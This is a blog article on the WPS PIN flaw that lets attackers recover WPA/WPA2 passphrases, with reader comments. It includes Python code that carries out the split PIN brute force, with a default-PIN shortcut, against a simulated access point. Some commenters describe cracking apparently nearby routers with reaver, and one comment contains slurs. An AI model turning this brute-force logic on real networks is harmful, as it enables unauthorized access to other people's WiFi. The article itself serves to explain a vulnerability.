A chink in the armor of WPA/WPA2 WiFi security

Looks like your WiFi might not be quite as secure as you thought it was. A paper recently published by [Stefan Viehböck] details a security flaw in the supposedly robust WPA/WPA2 WiFi security protocol. It’s not actually that protocol which is the culprit, but a built-in feature called Wi-Fi Protected Setup (WPS). This is an additional protocol that lets you easily set up network devices like printers without having to give them the WPA passphrase; instead the device proves it knows the eight-digit PIN printed on the access point. The problem is that the access point checks the PIN in two halves and tells the client which half was wrong, and the eighth digit is only a checksum of the first seven, so an attacker has to try at most about 11,000 PINs (10,000 for the first half plus 1,000 for the second) rather than 100 million. [Stefan’s] proof-of-concept recovers the WPS PIN in 4-10 hours using brute force. Once an attacker has that PIN, the access point hands over the WPA passphrase. Because the PIN is fixed, this works even if the passphrase is frequently changed.
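To make the arithmetic above concrete, here is an added example (not code from the paper or from any released tool) that implements the WPS PIN check digit and runs the split brute force against a simulated registrar. The `SimulatedRegistrar` class is a constructed stand-in for an access point: it only models the one property that matters, that a wrong first half and a wrong second half are rejected at different points of the exchange. The checksum arithmetic is the standard WPS one (weights 3 and 1 alternating over the digits from the right). The example also goes slightly beyond the article: it tries the common vendor default PIN first, and falls back to a full search of the last four digits for access points whose PIN does not carry a valid checksum.

```python
"""WPS PIN recovery against a simulated registrar (example code, not from the paper)."""


def wps_pin_checksum(first_seven: int) -> int:
    """Check digit used as the 8th digit of a WPS PIN.

    Walks the seven digits from the right, weighting them 3,1,3,1,...
    and returns the digit that brings the sum to a multiple of 10.
    """
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def full_pin(first_seven: int) -> str:
    """Render a 7-digit value as the 8-digit PIN with its check digit appended."""
    return f"{first_seven:07d}{wps_pin_checksum(first_seven)}"


class SimulatedRegistrar:
    """Constructed stand-in for an access point's WPS registrar.

    Real registrars verify the first four digits before the last four and
    NACK at different steps of the exchange (after M4 vs. after M6), which
    is exactly the leak this class reproduces. Nothing else is modelled.
    """

    def __init__(self, secret_pin: str):
        assert len(secret_pin) == 8 and secret_pin.isdigit()
        self.secret = secret_pin
        self.attempts = 0  # how many PIN exchanges the attacker had to run

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self.secret[:4]:
            return "NACK_M4"  # first half wrong, second half never inspected
        if pin[4:] != self.secret[4:]:
            return "NACK_M6"  # first half right, second half wrong
        return "OK"


DEFAULT_PIN = "12345670"  # a widely seen factory default; assumption, not from the paper


def brute_force(ap: SimulatedRegistrar, try_default_first: bool = True):
    """Recover the PIN in at most ~11,000 guesses (plus a fallback, see below)."""
    if try_default_first and ap.try_pin(DEFAULT_PIN) == "OK":
        return DEFAULT_PIN

    # Phase 1: first four digits, at most 10,000 guesses. The last four are
    # a placeholder "000" plus a valid check digit.
    first_half = None
    for h in range(10_000):
        cand = full_pin(h * 1000)
        resp = ap.try_pin(cand)
        if resp == "OK":
            return cand
        if resp == "NACK_M6":
            first_half = h
            break
    if first_half is None:
        return None

    # Phase 2: three free digits plus check digit, at most 1,000 guesses.
    for s in range(1000):
        cand = full_pin(first_half * 1000 + s)
        if ap.try_pin(cand) == "OK":
            return cand

    # Fallback for registrars whose PIN does not use a valid check digit:
    # search all remaining last-four combinations (at most 9,000 more).
    for last4 in range(10_000):
        s, c = divmod(last4, 10)
        if c == wps_pin_checksum(first_half * 1000 + s):
            continue  # already tried in phase 2
        cand = f"{first_half:04d}{last4:04d}"
        if ap.try_pin(cand) == "OK":
            return cand
    return None


if __name__ == "__main__":
    ap = SimulatedRegistrar("98765430")  # constructed secret with a valid check digit
    print(brute_force(ap), "after", ap.attempts, "attempts (max is 11001, not 10**8)")
```

Running the block prints the recovered PIN and the attempt count; for the constructed secret it lands at 10,422 exchanges, far below the 100 million a naive eight-digit search would need. Against a real access point each exchange takes on the order of a second or more, which is where the paper's 4-10 hour figure comes from.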

Apparently, most WiFi access points not only offer WPS but have it enabled by default. To further muck up the situation, some routers’ settings pages offer a disable switch that doesn’t actually do anything, so the only way to be sure is to test whether the access point still answers WPS requests.

It looks like [Stefan] wasn’t the only one working on this exploit. [Craig] wrote in to let us know he’s already released software to exploit the hole.

59 thoughts on “A chink in the armor of WPA/WPA2 WiFi security”

Oh good you had me worried for a second there. I don’t use that junk anyway. :-) I’ll bet most of us readers actually enjoy setting up our new networking hardware and never bothered with WPS. It is a little scary, however, to read that in some routers turning it off doesn’t actually do anything.

I just fed the reaver wps_pin_checksum() function the pin 1234567 and it returned a checksum of 0, not the 8 that I was expecting. I then looked at my actiontec router label in a brighter light, and indeed, it is a zero with a slash, which looks a lot like an 8.

I did mean WPS by “junk.” I guess I prematurely assumed disabling it in my router actually meant it was disabled. I then tested it and disabling WPS actually works for Motorola “Surfboard.”
As far as which firmwares are junk, stock or custom, I’ve noticed a fair amount of bugs in both.

Drat. I’ve got that router, but I’ve been looking at it sideways for months now. It only serves as a wireless access point and a switch… but I’ll be damned if I didn’t lose the thing on my network. It doesn’t show up in a ping sweep anywhere. It doesn’t show up as a hop. It’s just… missing.

I just checked mine, and yup, it’s enabled by default (now disabled). I never used WPS, so I didn’t even think about its vulnerability, and I didn’t know it was always on. That really shouldn’t be enabled by default.

I’m just ignorant of the method he’s talking about. Not familiar with one that needs two computers. Just making sure it’s not the same old guess-the-password method. If I acted cool, I wasn’t trying; it’s just something that happens when you’re cool, I guess.

I’m already testing out this software. It works pretty well so far. It has a few minor bugs, but the author is on top of them and has already released some updates to the code.
I’m using it on a VM of BT4R2 with an Alfa AWUS036H. It’s slow, but fast as shit compared to trying to crack WPA using a wordlist with the huge possibility of it not succeeding.
So far, every network around me is vulnerable to this attack. There isn’t a single one where WPS is disabled. And some of the people around me are supposedly tech experts working for comcast and verizon.
Something about WPS never seemed all that safe to me. I’ve always had it disabled. I’m surprised it took this long for someone to find an easily exploitable flaw.

Should the router makers care about the 1% of users who care about security?
Or the 99% who just want to plug in a printer and see it work? (and they don’t give a fuck about security)
HMM. That’s a tough choice, huh… lol
Defaults are for the 99%… They don’t even need to know the printer has an “Aye-pee”. (IP)
The paper just travels like magic from the computer to the tray.

I think we should forbid Hamlet too, because Polonius is killed because Hamlet thinks it is someone else behind the curtain. Curtains don’t kill people, people kill people. And we should stop with The Merchant of Venice too because of its antisemitism. We should call black tie dressing afro-american tie, we should call women people of female gender, and especially call people like you mentally challenged and not retarded.

Good ol’ OpenWrt, it has the lovely ‘feature’ of not supporting WPS at all in the LuCI interface. Sure, hostapd supports it, but there’s no frontend unless you feel like coding up your own. How thoughtful of them.

Nothing – NOTHING – is ever secure as people think it is. That has been proven against every new ‘secure’ technology that comes out.

Whether it’s tricking people into revealing their passwords, or stupid SQL administration that leads to internal document exposure that contains decryption keys, nothing will ever be completely secure.

Now broadcast encryption information over some wireless bands and let’s see how security ratings drop precipitously.

There is a difference between things being insecure and things being badly implemented. As far as I can tell WPA/WPA2 are still fairly secure, i.e. capturing cipher text and turning it into plain text is not trivial. Router vendors being retarded and shipping units with predictable keys etc. doesn’t mean that “WPA is insecure”, just that the vendors’ implementation is bad.

>>That has been proven against every new
>>‘secure’ technology that comes out.

After using reaver on a brand new Asus router with WPS turned off, we were shocked to see it print out our multi-word and symbol WPA2 passphrase in less than two hours.

Other routers were getting timeout errors, but after adjusting the timeout to 20 seconds 3 of them fell prey to reaver in less than a day. We may try a timeout of 25 seconds for the ones that are resisting.

Perhaps WPA isn’t cracked, but WPA *ROUTERS* are dropping like flies around here.

And by the way, most of them (multiple different brands) have a PIN code of 12345670, and most of them have WPS off. We could have gotten this done a LOT quicker if reaver checked that “standard default” PIN first.

Interesting, that new router that spilled its secrets so fast was from Asus, whose products are not even listed in the Cert advisory list of vulnerable routers.

When I first started setting up wireless nets, there was no such thing as WPS. I just got used to setting everything up by hand. When I bought my first router that did have WPS, I couldn’t get the thing to work using the WPS, so I just set it up manually and disabled the WPS. So, even now I still set up my nets manually, and disable WPS every time. I guess sometimes it’s good to be set in your ways.

Some 6 months before this article was published I was trying to connect to some network in Windows, and when I got the prompt for entering a PIN an idea crossed my mind: this shit might be easy to brute force :D